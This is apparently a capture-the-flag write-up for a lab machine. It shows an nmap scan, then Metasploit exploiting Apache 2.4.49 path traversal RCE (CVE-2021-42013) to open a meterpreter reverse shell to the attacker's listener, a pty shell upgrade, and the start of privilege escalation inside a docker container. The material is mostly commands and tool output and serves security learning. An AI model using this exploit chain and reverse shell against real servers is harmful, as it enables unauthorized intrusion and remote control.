# Nmap 7.92 scan initiated Thu Mar 31 20:00:05 2022 as: nmap -sSVC -p- -T4 -v -oA nmap_full 10.10.56.13 Nmap scan report for 10.10.56.13 Host is up (0.040s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA) | 256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA) |_ 256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519) 80/tcp open http Apache httpd 2.4.49 ((Unix)) |_http-title: Consult - Business Consultancy Agency Template | Home |_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C | http-methods: | Supported Methods: OPTIONS HEAD GET POST TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.49 (Unix) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Mar 31 20:02:30 2022 -- 1 IP address (1 host up) scanned in 144.91 seconds
Name Current Setting Required Description ---- --------------- -------- ----------- CVE CVE-2021-42013 yes The vulnerability to use (Accepted: CVE-2021-41773, CVE-2021-42013) DEPTH 5 yes Depth for Path Traversal Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS ohmyweb.thm yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /cgi-bin yes Base path VHOST no HTTP server virtual host
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.9.19.77 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Automatic (Dropper)
msf6 exploit(multi/http/apache_normalize_path_rce) > run
[*] Started reverse TCP handler on 10.9.19.77:4444 [*] Using auxiliary/scanner/http/apache_normalize_path as check [+] http://10.10.56.13:80 - The target is vulnerable to CVE-2021-42013 (mod_cgi is enabled). [*] Scanned 1 of 1 hosts (100% complete) [*] http://10.10.56.13:80 - Attempt to exploit for CVE-2021-42013 [*] http://10.10.56.13:80 - Sending linux/x64/meterpreter/reverse_tcp command payload [*] Sending stage (3020772 bytes) to 10.10.56.13 [*] Meterpreter session 1 opened (10.9.19.77:4444 -> 10.10.56.13:45242 ) at 2022-03-31 20:20:57 +0200 [!] This exploit may require manual cleanup of '/tmp/wAIYJ' on the target
We run with the user daemon:
1 2 3 4 5 6 7 8
meterpreter > shell Process 146 created. Channel 1 created.
id uid=1(daemon) gid=1(daemon) groups=1(daemon) python3 -c 'import pty;pty.spawn("/bin/bash")' daemon@4a70924bafa0:/bin$
Elevation of privilege (EoP): from daemon to root (docker)#
We don't see any non-daemon user in /home or /etc/passwd.
There is a /.dockerenv proving we are in a docker container.
Either with linpeas or getcap we can find binaries with capabilities.